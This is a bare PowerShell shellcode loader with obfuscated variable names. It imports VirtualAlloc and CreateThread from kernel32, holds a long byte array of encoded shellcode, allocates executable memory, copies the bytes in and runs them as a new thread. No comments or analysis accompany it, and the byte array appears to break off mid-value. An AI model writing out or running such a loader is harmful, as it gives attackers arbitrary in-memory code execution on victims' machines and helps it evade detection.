$DOtmLSRHP = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@

$eKMMQHmPD = Add-Type -memberDefinition $DOtmLSRHP -Name "Win32" -namespace Win32Functions -passthru

[Byte[]] $JxzXWSnxT = 0xdd,0xc5,0xb8,0xce,0x7a,0xd3,0xfb,0xd9,0x74,0x24,0xf4,0x5b,0x2b,0xc9,0xb1,0x60,0x83,0xc3,0x4,0x31,0x43,0x13,0x3,0x8d,0x69,0x31,0xe,0xab,0x68,0xdf,0x4b,0xa,0xad,0xe4,0x75,0xf8,0x6a,0x11,0xde,0x29,0xba,0x68,0xb8,0x18,0x6f,0x98,0x38,0x9,0x9c,0x1d,0xd5,0xb7,0x2a,0x6e,0x30,0xf1,0xbe,0xb5,0xfd,0xbf,0x24,0xac,0xa0,0x7c,0xf2,0x71,0x2b,0xd8,0x81,0x9d,0x6d,0xef,0x76,0x31,0x5b,0xdd,0xf5,0x63,0x48,0x5b,0xee,0xcf,0x1b,0xc8,0x8f,0x5a,0xff,0xf0,0xb,0x3c,0xd,0xf3,0x34,0xa4,0x27,0x9b,0xaf,0x79,0xcb,0xf1,0x8a,0x6d,0x8b,0x1f,0x1b,0x57,0x57,0x3,0x72,0x82,0x48,0x7c,0x8b,0x8,0x47,0x63,0x61,0x51,0xad,0xc6,0xbf,0x21,0x16,0xb4,0x92,0x81,0x59,0x1c,0x98,0x3a,0x37,0x92,0x83,0x97,0xda,0x12,0xcf,0x50,0x1d,0x60,0xea,0x2b,0x6b,0xdc,0x2d,0xef,0x1,0x91,0xc6,0x54,0xb0,0x8a,0x60,0x8,0x2f,0x74,0x62,0xaa,0xe1,0xa5,0xf8,0x4a,0x40,0xac,0x5d,0xa3,0xc,0xa3,0x93,0xf7,0x6f,0x59,0xc1,0x4d,0xbe,0xa9,0x2a,0x94,0x96,0x37,0xfc,0x26,0x1d,0xa0,0x48,0x41,0xe1,0xfc,0x5a,0xcc,0xde,0x7d,0xc5,0x66,0x88,0x82,0xe8,0xd7,0xb0,0x4f,0x4e,0xf8,0xbe,0x3,0x96,0xbd,0x12,0xce,0x30,0x50,0x1d,0x4a,0x71,0x8c,0x2a,0xa4,0xca,0xf1,0x82,0xf2,0x6,0xc9,0x93,0xbf,0xe0,0x1f,0xa1,0xae,0x22,0xaf,0x41,0x7,0xce,0x33,0xf,0xe6,0xba,0xcc,0x78,0x21,0x1e,0x94,0x8a,0x24,0xbd,0x6c,0xce,0x38,0x85,0xcd,0x8d,0x56,0xfd,0x1e,0x46,0x14,0x32,0x1a,0xc9,0xb,0x77,0x75,0x3e,0x86,0x12,0x34,0xfb,0xd0,0xd6,0x55,0xbc,0x79,0x7a,0x40,0x72,0xf,0x61,0xee,0x12,0xac,0x1a,0xfd,0xbd,0x2,0xe4,0xd,0x25,0xfb,0xeb,0x86,0xbb,0xc1,0xa6,0xdb,0x74,0xec,0x90,0xd6,0xe0,0xb1,0x93,0x39,0x9,0x5d,0xfb,0x61,0x5,0x1c,0x29,0x6f,0x80,0x1b,0x49,0xcb,0xb3,0xf,0x66,0x43,0xde,0x10,0x6c,0x73,0x37,0xd7,0x66,0xbb,0x29,0x12,0x19,0xe4,0xcc,0x48,0x16,0xfb,0x5f,0x87,0x6b,0xc3,0x59,0x66,0xdb,0xd8,0xe3,0xb5,0x80,0x46,0x86,0x1b,0xef,0x6d,0xad,0xad,0x9,0xc6,0x91,0x4f,0xf3,0xf3,0xbd,0xe1,0x6a,0xfd,0xf8,0xe3,0x9d,0x6c,0xd5,0xa6,0xef,0x21,0xca,0x9,0xec,0xe5,0xb9,0xb8,0xaa,0x80,0x49,0xc5,0x6f,0xf4,0x53,0x57,0x4,0x9d,0x34,0xda,0x4d,0x61,0x71,0x77,0xc4,0x82,0xba,0x85,0x4a,0x4,0x1a,0x41,0x95,0x2f,0xea,0xef,0x58,0xf7,0xf


$JcolGMfIibHFuWJ = $eKMMQHmPD::VirtualAlloc(0,[Math]::Max($JxzXWSnxT.Length,0x1000),0x3000,0x40)

[System.Runtime.InteropServices.Marshal]::Copy($JxzXWSnxT,0,$JcolGMfIibHFuWJ,$JxzXWSnxT.Length)

$eKMMQHmPD::CreateThread(0,0,$JcolGMfIibHFuWJ,0,0,0)
